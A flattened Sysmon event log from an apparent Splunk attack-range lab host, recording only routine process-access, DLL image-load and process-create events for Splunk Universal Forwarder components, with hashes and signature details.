13:07:45.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02DtrueSplunk, Inc.Valid 10341000x8000000000000000101001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:45.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:45.905{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.906{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control 
ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.390{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F53179ACB6001660C6E1CD0472BA529,SHA256=A8CDFA6BF0156CBE3B98B9CE23737C2166BD63E93D531F97209DDB4B868D19F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000101100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000101099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 
(rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000101098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000101097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000101096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000101095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000101094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000101093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 
734700x8000000000000000101092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x8000000000000000101091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000101090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000101089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000101088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000101087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000101086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000101085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000101084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000101083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 
734700x8000000000000000101082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000101081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000101080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000101079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000101078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000101077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000101076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000101075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000101074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000101073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000101072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 
734700x8000000000000000101071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000101070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x8000000000000000101069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000101068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program 
